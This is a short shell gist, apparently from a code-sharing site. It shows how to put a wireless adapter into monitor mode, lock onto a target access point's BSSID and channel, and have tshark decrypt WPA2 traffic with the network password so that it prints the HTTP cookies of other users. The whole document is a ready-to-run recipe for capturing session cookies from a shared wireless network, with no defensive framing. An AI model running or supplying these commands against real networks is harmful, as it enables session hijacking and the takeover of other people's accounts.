How to decrypt wpa2 packets and use tshark to display cookies. You need to replace wlan1 with whichever wireless adapter you want to use, the bssid, the channel, and the wpa password.

gistfile1.sh

airmon-ng start wlan1
airodump-ng mon0 --bssid  00:16:B6:DA:XX:XX --channel 6
tshark -i mon0 -o wlan.enable_decryption:TRUE -o wlan.wep_key1:wpa-pwd:<the_wpa_password> -R "http.cookie" -T fields -e http.cookie